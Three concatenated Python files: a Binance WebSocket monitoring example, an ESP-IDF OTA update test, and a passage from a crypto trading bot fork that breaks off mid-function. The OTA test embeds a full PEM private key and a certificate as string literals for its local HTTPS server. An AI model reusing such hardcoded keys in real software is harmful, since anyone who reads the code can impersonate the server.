example_monitoring.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_monitoring.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api
# Documentation: https://lucit-systems-and-development.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: LUCIT Systems and Development
#
# Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.manager import BinanceWebSocketApiManager
import logging
import os
import sys
import time
import threading
logging.getLogger("unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager")
logging.basicConfig(level=logging.DEBUG,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
sys.exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
else:
try:
# remove # to activate the print function:
print(oldest_stream_data_from_stream_buffer)
except KeyError:
# Any kind of error...
# not able to process the data? write it back to the stream_buffer
binance_websocket_api_manager.add_to_stream_buffer(oldest_stream_data_from_stream_buffer)
# create instance of BinanceWebSocketApiManager and provide the function for stream processing
binance_websocket_api_manager = BinanceWebSocketApiManager()
# create streams
ticker_all_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!ticker"])
miniticker_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!miniTicker"])
markets = {'bnbbtc', 'ethbtc', 'btcusdt', 'bchabcusdt', 'xrpusdt', 'rvnbtc', 'ltcusdt', 'adausdt', 'eosusdt',
'neousdt', 'bnbusdt', 'adabtc', 'ethusdt', 'trxbtc', 'bchabcbtc', 'ltcbtc', 'xrpbtc',
'ontbtc', 'bttusdt', 'eosbtc', 'xlmbtc', 'bttbtc', 'tusdusdt', 'xlmusdt', 'qkcbtc', 'zrxbtc',
'neobtc', 'adaeth', 'icxusdt', 'btctusd', 'icxbtc', 'btcusdc', 'wanbtc', 'zecbtc', 'wtcbtc',
'batbtc', 'adabnb', 'etcusdt', 'qtumusdt', 'xmrbtc', 'trxeth', 'adatusd', 'trxxrp', 'trxbnb',
'dashbtc', 'rvnbnb', 'bchabctusd', 'etcbtc', 'bnbeth', 'ethpax', 'nanobtc', 'xembtc', 'xrpbnb',
'bchabcpax', 'xrpeth', 'bttbnb', 'ltcbnb', 'agibtc', 'zrxusdt', 'xlmbnb', 'ltceth', 'eoseth',
'ltctusd', 'polybnb', 'scbtc', 'steembtc', 'trxtusd', 'npxseth', 'kmdbtc', 'polybtc', 'gasbtc',
'engbtc', 'zileth', 'xlmeth', 'eosbnb', 'xrppax', 'lskbtc', 'npxsbtc', 'xmrusdt', 'ltcpax',
'ethtusd', 'batusdt', 'mcobtc', 'neoeth', 'bntbtc', 'eostusd', 'lrcbtc', 'funbtc', 'zecusdt',
'bnbpax', 'linkusdt', 'hceth', 'zrxeth', 'icxeth', 'xmreth', 'neobnb', 'etceth', 'zeceth', 'xmrbnb',
'wanbnb', 'zrxbnb', 'agibnb', 'funeth', 'arketh', 'engeth'}
binance_websocket_api_manager.create_stream(["aggTrade"], markets)
binance_websocket_api_manager.create_stream(["trade"], markets)
binance_websocket_api_manager.create_stream(["kline_1m"], markets)
binance_websocket_api_manager.create_stream(["kline_5m"], markets)
binance_websocket_api_manager.create_stream(["kline_15m"], markets)
binance_websocket_api_manager.create_stream(["kline_1h"], markets)
binance_websocket_api_manager.create_stream(["kline_12h"], markets)
binance_websocket_api_manager.create_stream(["kline_1w"], markets)
binance_websocket_api_manager.create_stream(["ticker"], markets)
binance_websocket_api_manager.create_stream(["miniTicker"], markets)
binance_websocket_api_manager.create_stream(["depth"], markets)
binance_websocket_api_manager.create_stream(["depth5"], markets)
binance_websocket_api_manager.create_stream(["depth10"], markets)
binance_websocket_api_manager.create_stream(["depth20"], markets)
binance_websocket_api_manager.create_stream(["aggTrade"], markets)
markets = {'bnbbtc', 'ethbtc', 'btcusdt', 'bchabcusdt', 'xrpusdt', 'rvnbtc', 'ltcusdt', 'adausdt', 'eosusdt',
'neobtc', 'adaeth', 'icxusdt', 'btctusd', 'icxbtc', 'btcusdc', 'wanbtc', 'zecbtc', 'wtcbtc',
'batbtc', 'adabnb', 'etcusdt', 'qtumusdt', 'xmrbtc', 'trxeth', 'adatusd', 'trxxrp', 'trxbnb',
'ltctusd', 'polybnb', 'scbtc', 'steembtc', 'trxtusd', 'npxseth', 'kmdbtc', 'polybtc', 'gasbtc',
'bnbpax', 'linkusdt', 'hceth', 'zrxeth', 'icxeth', 'xmreth', 'neobnb', 'etceth', 'zeceth', 'xmrbnb'}
channels = {'trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_12h', 'kline_1w',
'miniTicker', 'depth20'}
binance_websocket_api_manager.create_stream(channels, markets)
# start a worker process to process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
# start a restful api server to report the current status to 'tools/icinga/check_binance_websocket_manager' which can be
# used as a check_command for ICINGA/Nagios
#binance_websocket_api_manager.start_monitoring_api(warn_on_update=False)
binance_websocket_api_manager.start_monitoring_api()
# if you like to not only listen on localhost use 'host="0.0.0.0"'
# for a specific port do 'port=80'
# binance_websocket_api_manager.start_monitoring_api(host="0.0.0.0", port=80)
print("18 websockets started!")
print("Continue here: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/"
"UNICORN-Monitoring-API-Service")
|
example_test.py | import re
import os
import socket
from threading import Thread
import ssl
from tiny_test_fw import DUT
import ttfw_idf
try:
import BaseHTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
except ImportError:
import http.server as BaseHTTPServer
from http.server import SimpleHTTPRequestHandler
server_cert = "-----BEGIN CERTIFICATE-----\n" \
"MIIDXTCCAkWgAwIBAgIJAP4LF7E72HakMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV\n"\
"BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX\n"\
"aWRnaXRzIFB0eSBMdGQwHhcNMTkwNjA3MDk1OTE2WhcNMjAwNjA2MDk1OTE2WjBF\n"\
"MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50\n"\
"ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB\n"\
"CgKCAQEAlzfCyv3mIv7TlLkObxunKfCdrJ/zgdANrsx0RBtpEPhV560hWJ0fEin0\n"\
"nIOMpJSiF9E6QsPdr6Q+eogH4XnOMU9JE+iG743N1dPfGEzJvRlyct/Ck8SswKPC\n"\
"9+VXsnOdZmUw9y/xtANbURA/TspvPzz3Avv382ffffrJGh7ooOmaZSCZFlSYHLZA\n"\
"w/XlRr0sSRbLpFGY0gXjaAV8iHHiPDYLy4kZOepjV9U51xi+IGsL4w75zuMgsHyF\n"\
"3nJeGYHgtGVBrkL0ZKG5udY0wcBjysjubDJC4iSlNiq2HD3fhs7j6CZddV2v845M\n"\
"lVKNxP0kO4Uj4D8r+5USWC8JKfAwxQIDAQABo1AwTjAdBgNVHQ4EFgQU6OE7ssfY\n"\
"IIPTDThiUoofUpsD5NwwHwYDVR0jBBgwFoAU6OE7ssfYIIPTDThiUoofUpsD5Nww\n"\
"DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAXIlHS/FJWfmcinUAxyBd\n"\
"/xd5Lu8ykeru6oaUCci+Vk9lyoMMES7lQ+b/00d5x7AcTawkTil9EWpBTPTOTraA\n"\
"lzJMQhNKmSLk0iIoTtAJtSZgUSpIIozqK6lenxQQDsHbXKU6h+u9H6KZE8YcjsFl\n"\
"6vL7sw9BVotw/VxfgjQ5OSGLgoLrdVT0z5C2qOuwOgz1c7jNiJhtMdwN+cOtnJp2\n"\
"fuBgEYyE3eeuWogvkWoDcIA8r17Ixzkpq2oJsdvZcHZPIZShPKW2SHUsl98KDemu\n"\
"y0pQyExmQUbwKE4vbFb9XuWCcL9XaOHQytyszt2DeD67AipvoBwVU7/LBOvqnsmy\n"\
"hA==\n"\
"-----END CERTIFICATE-----\n"
server_key = "-----BEGIN PRIVATE KEY-----\n"\
"MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCXN8LK/eYi/tOU\n"\
"uQ5vG6cp8J2sn/OB0A2uzHREG2kQ+FXnrSFYnR8SKfScg4yklKIX0TpCw92vpD56\n"\
"iAfhec4xT0kT6Ibvjc3V098YTMm9GXJy38KTxKzAo8L35Veyc51mZTD3L/G0A1tR\n"\
"ED9Oym8/PPcC+/fzZ999+skaHuig6ZplIJkWVJgctkDD9eVGvSxJFsukUZjSBeNo\n"\
"BXyIceI8NgvLiRk56mNX1TnXGL4gawvjDvnO4yCwfIXecl4ZgeC0ZUGuQvRkobm5\n"\
"1jTBwGPKyO5sMkLiJKU2KrYcPd+GzuPoJl11Xa/zjkyVUo3E/SQ7hSPgPyv7lRJY\n"\
"Lwkp8DDFAgMBAAECggEAfBhAfQE7mUByNbxgAgI5fot9eaqR1Nf+QpJ6X2H3KPwC\n"\
"02sa0HOwieFwYfj6tB1doBoNq7i89mTc+QUlIn4pHgIowHO0OGawomeKz5BEhjCZ\n"\
"4XeLYGSoODary2+kNkf2xY8JTfFEcyvGBpJEwc4S2VyYgRRx+IgnumTSH+N5mIKZ\n"\
"SXWNdZIuHEmkwod+rPRXs6/r+PH0eVW6WfpINEbr4zVAGXJx2zXQwd2cuV1GTJWh\n"\
"cPVOXLu+XJ9im9B370cYN6GqUnR3fui13urYbnWnEf3syvoH/zuZkyrVChauoFf8\n"\
"8EGb74/HhXK7Q2s8NRakx2c7OxQifCbcy03liUMmyQKBgQDFAob5B/66N4Q2cq/N\n"\
"MWPf98kYBYoLaeEOhEJhLQlKk0pIFCTmtpmUbpoEes2kCUbH7RwczpYko8tlKyoB\n"\
"6Fn6RY4zQQ64KZJI6kQVsjkYpcP/ihnOY6rbds+3yyv+4uPX7Eh9sYZwZMggE19M\n"\
"CkFHkwAjiwqhiiSlUxe20sWmowKBgQDEfx4lxuFzA1PBPeZKGVBTxYPQf+DSLCre\n"\
"ZFg3ZmrxbCjRq1O7Lra4FXWD3dmRq7NDk79JofoW50yD8wD7I0B7opdDfXD2idO8\n"\
"0dBnWUKDr2CAXyoLEINce9kJPbx4kFBQRN9PiGF7VkDQxeQ3kfS8CvcErpTKCOdy\n"\
"5wOwBTwJdwKBgDiTFTeGeDv5nVoVbS67tDao7XKchJvqd9q3WGiXikeELJyuTDqE\n"\
"zW22pTwMF+m3UEAxcxVCrhMvhkUzNAkANHaOatuFHzj7lyqhO5QPbh4J3FMR0X9X\n"\
"V8VWRSg+jA/SECP9koOl6zlzd5Tee0tW1pA7QpryXscs6IEhb3ns5R2JAoGAIkzO\n"\
"RmnhEOKTzDex611f2D+yMsMfy5BKK2f4vjLymBH5TiBKDXKqEpgsW0huoi8Gq9Uu\n"\
"nvvXXAgkIyRYF36f0vUe0nkjLuYAQAWgC2pZYgNLJR13iVbol0xHJoXQUHtgiaJ8\n"\
"GLYFzjHQPqFMpSalQe3oELko39uOC1CoJCHFySECgYBeycUnRBikCO2n8DNhY4Eg\n"\
"9Y3oxcssRt6ea5BZwgW2eAYi7/XqKkmxoSoOykUt3MJx9+EkkrL17bxFSpkj1tvL\n"\
"qvxn7egtsKjjgGNAxwXC4MwCvhveyUQQxtQb8AqGrGqo4jEEN0L15cnP38i2x1Uo\n"\
"muhfskWf4MABV0yTUaKcGg==\n"\
"-----END PRIVATE KEY-----\n"
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(("8.8.8.8", 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def start_https_server(ota_image_dir, server_ip, server_port):
# parser = argparse.ArgumentParser()
# parser.add_argument('-p', '--port', dest='port', type= int,
# help= "Server Port", default= 8000)
# args = parser.parse_args()
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, "server_cert.pem")
cert_file_handle = open(server_file, "w+")
cert_file_handle.write(server_cert)
cert_file_handle.close()
key_file = os.path.join(ota_image_dir, "server_key.pem")
key_file_handle = open("server_key.pem", "w+")
key_file_handle.write(server_key)
key_file_handle.close()
httpd = BaseHTTPServer.HTTPServer((server_ip, server_port),
SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_simple_ota_example(env, extra_data):
"""
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("simple_ota_example", "examples/system/ota/simple_ota_example", dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "simple_ota.bin")
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("simple_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("simple_ota_bin_size", bin_size // 1024, dut1.TARGET)
# start test
host_ip = get_my_ip()
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, 8000))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset 0x10000", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.close()
dut1.expect("Starting OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8000/simple_ota.bin"))
dut1.write("https://" + host_ip + ":8000/simple_ota.bin")
dut1.expect("Loaded app from partition at offset 0x110000", timeout=60)
dut1.expect("Starting OTA example", timeout=30)
if __name__ == '__main__':
test_examples_protocol_simple_ota_example()
|
Binance Detect Moonings.py | """
Olorin Sledge Fork
Version: 1.28
Disclaimer
All investment strategies and investments involve risk of loss.
Nothing contained in this program, scripts, code or repositoy should be
construed as investment advice.Any reference to an investment's past or
potential performance is not, and should not be construed as, a recommendation
or as a guarantee of any specific outcome or profit.
By using this program you accept all liabilities,
and that no claims can be made against the developers,
or others connected with the program.
See requirements.txt for versions of modules needed
!! IMPORTANT INFORMATION ABOUT EXTERNAL SIGNAL MODULES !!
Please note this very important difference. If you use any external signals, they need to be modified as follows:
1) If it is a buy signal, you need to replace .exs with .buy so it creates a signals/whatever.buy (where "whatever" is anything you want)
2) If it is a sell signal, you need to replace .exs with .sell so it creates a signals/whatever.sell (where "whatever" is anything you want)
3) If it is a pausebot signal, you need to create a signals/pausebot.pause file
All these changes are within the external signal itself and is really easy to do via Find/Replace (advice you manually review any replace you do).
FUNCTIONALITY
- Changed way profit % is calculated to be based on ROI
- More details provided on screen on state of bot (i.e. unrealised session profit, session profit, all time profit, bot paused or not etc)
- Totally reworked external signals. NOTE: you CANNOT use the default signals anymore with my bot unless you modify them to work with it
- Sell all coins on stopping bot functionality
- Stop bot on session profit / session stop loss trigger
- Only sell based on an external signal i.e. Stop Loss and Take Profit are ignored
- Discord support
- Better reporting in trades.txt
- A history.txt that records state of bot every minute (useful for past analysis /charting)
- Better error trapping on certain exceptions
- BNB is no longer used as the reference for TIME_DIFFERENCE, this allows one to not have it in their tickers.txt list.
- Tickers list can now auto reload (if set in the config.yml file)
- Held coins displayed in a Table format
- Market profit vs Bot profit comparison
- Restart an external signal every hour
- Sell a specific coin on stopping bot funciton
- Bot can reinvest any profits from coins sold so as to compound your profits. Please note, this will also compound any losses so use with care.
Configurable in configy.yml with REINVEST_PROFITS flag.
Added version 1.20:
- Has a "Market Profit". This is a comparison between your bots profits and if you had just bought BTC instead when you started your bot.
Please note: If your bot has already been running for a period of time, you will need to manually modify your bots_stat.json and update
the "market_startprice" variable. This needs to be the price of BTC when your bot originally started.
Added version 1.21:
- Ability to "restart" an external signal via the RESTART_EXTSIGNALS setting. Please only use this is you know what you are doing. 99% of the time
you will want this to be False
Added version 1.25:
- "BUYING MODE" added to summary info so you can easily tell if you are in Test mode or Live mode
- "External Signals" added to summary info so you can tell which external signals you have running
Added version 1.26:
- "Sell A Specific Coin" feature enhancement added. When you end the bot, it gives you the option to sell a specific coin.
1. The bot will display the coins you can sell in a table
2. Type in the SYMBOL including the pair and the bot will sell it.
3. It will loop 1 to 2 until you choose N
4. Bot ends
Added version 1.27
- Menu system on stopping (CTRL+C) the bot for options to: Exit bot, sell all coins, sell specific coin, resume bot
Added version 1.28
- Reinvest profits, and losses, to compound capital
DONATIONS
If you feel you would like to donate to me, for all the above improvements, I would greatly appreciate it. Please see donation options below.
Bitcoin (BTC network): 1DMRzMWXRXLeTQ9mfN9uvMTeJHmkkG5oS8
Etherium (ERC-20 network): 0x69566c866817c593d8a40a1b672afa3b7cfd69bf
Matic (Polygon network): 0x69566c866817c593d8a40a1b672afa3b7cfd69bf
BNB (BEP20 network): 0x69566c866817c593d8a40a1b672afa3b7cfd69bf
Fantom (FTM network): 0x69566c866817c593d8a40a1b672afa3b7cfd69bf
Algo (Algorand network): ML72MOJ7N3O4G4EGDLKICNOCMIBCH4U5I34WCXZ4B4HREPBA3ME7BOYPB4
Nano (Nano network): nano_1en6m9rx9wgwqu5e1otedzprpgjbnrjs43gi9g94r5nu31ikc1heytt8qd74
ORIGINAL BOT CREATOR
This bot was forked from the original creation by CyberPunkMetalHead.
You can find his repository of projects at https://github.com/CyberPunkMetalHead.
You can find details to donate to him at his website, https://www.cryptomaton.org.
"""
# use for environment variables
import os
# use if needed to pass args to external modules
import sys
# used for math functions
import math
# used to create threads & dynamic loading of modules
import threading
import multiprocessing
import importlib
# used for directory handling
import glob
#discord needs import request
import requests
# Needed for colorful console output Install with: python3 -m pip install colorama (Mac/Linux) or pip install colorama (PC)
from colorama import init
init()
# needed for the binance API / websockets / Exception handling
from binance.client import Client
from binance.exceptions import BinanceAPIException
from binance.helpers import round_step_size
from requests.exceptions import ReadTimeout, ConnectionError
# used for dates
from datetime import date, datetime, timedelta
import time
# used to repeatedly execute the code
from itertools import count
# used to store trades and sell assets
import json
# used to display holding coins in an ascii table
from prettytable import PrettyTable
# Load helper modules
from helpers.parameters import (
parse_args, load_config
)
# Load creds modules
from helpers.handle_creds import (
load_correct_creds, test_api_key,
load_discord_creds
)
# my helper utils
from helpers.os_utils import(rchop)
# for colourful logging to the console
class txcolors:
BUY = '\033[92m'
WARNING = '\033[93m'
SELL_LOSS = '\033[91m'
SELL_PROFIT = '\033[32m'
DIM = '\033[2m\033[35m'
DEFAULT = '\033[39m'
YELLOW = '\033[33m'
CYAN = '\033[96m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
ENDC = '\033[0m'
# tracks profit/loss each session
global session_profit_incfees_perc, session_profit_incfees_total, session_tpsl_override_msg, is_bot_running
session_profit_incfees_perc = 0
session_profit_incfees_total = 0
session_tpsl_override_msg = ""
is_bot_running = True
global historic_profit_incfees_perc, historic_profit_incfees_total, trade_wins, trade_losses
global sell_all_coins, bot_started_datetime, market_startprice, market_currprice, sell_specific_coin
try:
historic_profit_incfees_perc
except NameError:
historic_profit_incfees_perc = 0 # or some other default value.
try:
historic_profit_incfees_total
except NameError:
historic_profit_incfees_total = 0 # or some other default value.
try:
trade_wins
except NameError:
trade_wins = 0 # or some other default value.
try:
trade_losses
except NameError:
trade_losses = 0 # or some other default value.
bot_started_datetime = ""
market_startprice = 0
# print with timestamps
old_out = sys.stdout
class St_ampe_dOut:
"""Stamped stdout."""
nl = True
def write(self, x):
"""Write function overloaded."""
if x == '\n':
old_out.write(x)
self.nl = True
elif self.nl:
old_out.write(f'{txcolors.DIM}[{str(datetime.now().replace(microsecond=0))}]{txcolors.DEFAULT} {x}')
self.nl = False
else:
old_out.write(x)
def flush(self):
pass
sys.stdout = St_ampe_dOut()
def is_fiat():
# check if we are using a fiat as a base currency
global hsp_head
PAIR_WITH = parsed_config['trading_options']['PAIR_WITH']
#list below is in the order that Binance displays them, apologies for not using ASC order
fiats = ['USDT', 'BUSD', 'AUD', 'BRL', 'EUR', 'GBP', 'RUB', 'TRY', 'TUSD', 'USDC', 'PAX', 'BIDR', 'DAI', 'IDRT', 'UAH', 'NGN', 'VAI', 'BVND']
if PAIR_WITH in fiats:
return True
else:
return False
def decimals():
# set number of decimals for reporting fractions
if is_fiat():
return 4
else:
return 8
def print_table(table):
global old_out
print('')
sys.stdout = old_out
print(table)
sys.stdout = St_ampe_dOut()
def print_notimestamp(msg):
global old_out
sys.stdout = old_out
print(msg, end = ' ')
sys.stdout = St_ampe_dOut()
def get_price(add_to_historical=True):
'''Return the current price for all coins on binance'''
global historical_prices, hsp_head, market_startprice, market_currprice
initial_price = {}
prices = client.get_all_tickers()
for coin in prices:
if coin['symbol'] == "BTCUSDT":
if market_startprice == 0:
market_startprice = float(coin['price'])
market_currprice = float(coin['price'])
if CUSTOM_LIST:
if any(item + PAIR_WITH == coin['symbol'] for item in tickers) and all(item not in coin['symbol'] for item in FIATS):
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
else:
if PAIR_WITH in coin['symbol'] and all(item not in coin['symbol'] for item in FIATS):
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
if add_to_historical:
hsp_head += 1
if hsp_head == RECHECK_INTERVAL:
hsp_head = 0
historical_prices[hsp_head] = initial_price
return initial_price
def wait_for_price():
'''calls the initial price and ensures the correct amount of time has passed
before reading the current price again'''
global historical_prices, hsp_head, volatility_cooloff
volatile_coins = {}
externals = {}
coins_up = 0
coins_down = 0
coins_unchanged = 0
pause_bot()
# get first element from the dictionary
firstcoin = next(iter(historical_prices[hsp_head]))
#BBif historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'] > datetime.now() - timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)):
if historical_prices[hsp_head][firstcoin]['time'] > datetime.now() - timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)):
# sleep for exactly the amount of time required
#BBtime.sleep((timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)) - (datetime.now() - historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'])).total_seconds())
time.sleep((timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)) - (datetime.now() - historical_prices[hsp_head][firstcoin]['time'])).total_seconds())
# retrieve latest prices
#last_price = get_price()
last_price = wrap_get_price()
# calculate the difference in prices
for coin in historical_prices[hsp_head]:
# minimum and maximum prices over time period
try:
min_price = min(historical_prices, key = lambda x: float("inf") if x is None else float(x[coin]['price']))
max_price = max(historical_prices, key = lambda x: -1 if x is None else float(x[coin]['price']))
threshold_check = (-1.0 if min_price[coin]['time'] > max_price[coin]['time'] else 1.0) * (float(max_price[coin]['price']) - float(min_price[coin]['price'])) / float(min_price[coin]['price']) * 100
#if coin == "BTCUSDT" or coin == "ETHUSDT":
#print(f"coin: {coin} min_price: {min_price[coin]['price']} max_price: {max_price[coin]['price']}")
except KeyError:
if DEBUG:
print(f"wait_for_price(): Got a KeyError for {coin}. If this coin was just added to your tickers file, no need to worry about this KeyError.")
continue
# FOR NEGATIVE PRICE CHECKING
#if threshold_check>0 and CHANGE_IN_PRICE<0: threshold_check=0
# each coin with higher gains than our CHANGE_IN_PRICE is added to the volatile_coins dict if less than TRADE_SLOTS is not reached.
# FOR NEGATIVE PRICE CHECKING
#if abs(threshold_check) > abs(CHANGE_IN_PRICE):
if threshold_check > CHANGE_IN_PRICE:
coins_up +=1
if coin not in volatility_cooloff:
volatility_cooloff[coin] = datetime.now() - timedelta(minutes=TIME_DIFFERENCE)
# volatility_cooloff[coin] = datetime.now() - timedelta(minutes=COOLOFF_PERIOD)
# only include coin as volatile if it hasn't been picked up in the last TIME_DIFFERENCE minutes already
if datetime.now() >= volatility_cooloff[coin] + timedelta(minutes=TIME_DIFFERENCE):
#if datetime.now() >= volatility_cooloff[coin] + timedelta(minutes=COOLOFF_PERIOD):
volatility_cooloff[coin] = datetime.now()
if len(coins_bought) + len(volatile_coins) < TRADE_SLOTS or TRADE_SLOTS == 0:
volatile_coins[coin] = round(threshold_check, 3)
print(f'{coin} has gained {volatile_coins[coin]}% within the last {TIME_DIFFERENCE} minutes, purchasing ${TRADE_TOTAL} {PAIR_WITH} of {coin}!')
else:
print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but you are using all available trade slots!{txcolors.DEFAULT}')
#else:
#if len(coins_bought) == TRADE_SLOTS:
# print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but you are using all available trade slots!{txcolors.DEFAULT}')
#else:
# print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but failed cool off period of {COOLOFF_PERIOD} minutes! Curr COP is {volatility_cooloff[coin] + timedelta(minutes=COOLOFF_PERIOD)}{txcolors.DEFAULT}')
elif threshold_check < CHANGE_IN_PRICE:
coins_down +=1
else:
coins_unchanged +=1
# Disabled until fix
#print(f'Up: {coins_up} Down: {coins_down} Unchanged: {coins_unchanged}')
# Here goes new code for external signalling
externals = buy_external_signals()
exnumber = 0
for excoin in externals:
if excoin not in volatile_coins and excoin not in coins_bought and \
(len(coins_bought) + len(volatile_coins)) < TRADE_SLOTS:
#(len(coins_bought) + exnumber + len(volatile_coins)) < TRADE_SLOTS:
volatile_coins[excoin] = 1
exnumber +=1
print(f"External signal received on {excoin}, purchasing ${TRADE_TOTAL} {PAIR_WITH} value of {excoin}!")
balance_report(last_price)
return volatile_coins, len(volatile_coins), historical_prices[hsp_head]
def buy_external_signals():
external_list = {}
signals = {}
# check directory and load pairs from files into external_list
signals = glob.glob("signals/*.buy")
for filename in signals:
for line in open(filename):
symbol = line.strip()
external_list[symbol] = symbol
try:
os.remove(filename)
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file{txcolors.DEFAULT}')
return external_list
def sell_external_signals():
external_list = {}
signals = {}
# check directory and load pairs from files into external_list
signals = glob.glob("signals/*.sell")
for filename in signals:
for line in open(filename):
symbol = line.strip()
external_list[symbol] = symbol
if DEBUG: print(f'{symbol} added to sell_external_signals() list')
try:
os.remove(filename)
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external SELL signalling file{txcolors.DEFAULT}')
return external_list
def balance_report(last_price):
global trade_wins, trade_losses, session_profit_incfees_perc, session_profit_incfees_total
unrealised_session_profit_incfees_perc = 0
unrealised_session_profit_incfees_total = 0
BUDGET = TRADE_SLOTS * TRADE_TOTAL
exposure_calcuated = 0
for coin in list(coins_bought):
LastPrice = float(last_price[coin]['price'])
sellFee = (LastPrice * (TRADING_FEE/100))
BuyPrice = float(coins_bought[coin]['bought_at'])
buyFee = (BuyPrice * (TRADING_FEE/100))
exposure_calcuated = exposure_calcuated + round(float(coins_bought[coin]['bought_at']) * float(coins_bought[coin]['volume']),0)
#PriceChangeIncFees_Total = float(((LastPrice+sellFee) - (BuyPrice+buyFee)) * coins_bought[coin]['volume'])
PriceChangeIncFees_Total = float(((LastPrice-sellFee) - (BuyPrice+buyFee)) * coins_bought[coin]['volume'])
# unrealised_session_profit_incfees_perc = float(unrealised_session_profit_incfees_perc + PriceChangeIncFees_Perc)
unrealised_session_profit_incfees_total = float(unrealised_session_profit_incfees_total + PriceChangeIncFees_Total)
unrealised_session_profit_incfees_perc = (unrealised_session_profit_incfees_total / BUDGET) * 100
DECIMALS = int(decimals())
# CURRENT_EXPOSURE = round((TRADE_TOTAL * len(coins_bought)), DECIMALS)
CURRENT_EXPOSURE = round(exposure_calcuated, 0)
INVESTMENT_TOTAL = round((TRADE_TOTAL * TRADE_SLOTS), DECIMALS)
# truncating some of the above values to the correct decimal places before printing
WIN_LOSS_PERCENT = 0
if (trade_wins > 0) and (trade_losses > 0):
WIN_LOSS_PERCENT = round((trade_wins / (trade_wins+trade_losses)) * 100, 2)
if (trade_wins > 0) and (trade_losses == 0):
WIN_LOSS_PERCENT = 100
market_profit = ((market_currprice - market_startprice)/ market_startprice) * 100
mode = "Live (REAL MONEY)"
discord_mode = "Live"
if TEST_MODE:
mode = "Test (no real money used)"
